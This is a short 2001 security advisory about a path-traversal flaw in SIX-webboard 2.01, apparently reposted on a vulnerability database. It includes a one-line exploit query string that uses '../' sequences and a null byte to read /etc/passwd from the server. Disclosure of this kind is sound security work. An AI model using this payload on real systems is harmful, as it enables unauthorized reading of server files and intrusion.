SIX-webboard 2.01 "show files" vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2001-08-14T00:00:00


  • a little bit late, but "it's better late than never"! *

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-

-NAME: SIX-webboard 2.01 "show files" vulnerability.

-DESCRIPTION: Little, but very popular webboard coded by Pipo ( Find more information about the SIX-webboard here: or

-PROBLEM: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally.

-EXPLOIT: ?content=../../../../../../../../../etc/passwd% 00&board=boardsname !The above line if given will output the file contents of /etc/passwd

-AUTHORs: Discovery: digitalseed and k$en0r Advisory: digitalseed

-DISCLAIMER: PoizonB0x may not be held liable for the use or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk.

-COPYRIGHT: PoizonB0x Crew - (c) 2000- 2001

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-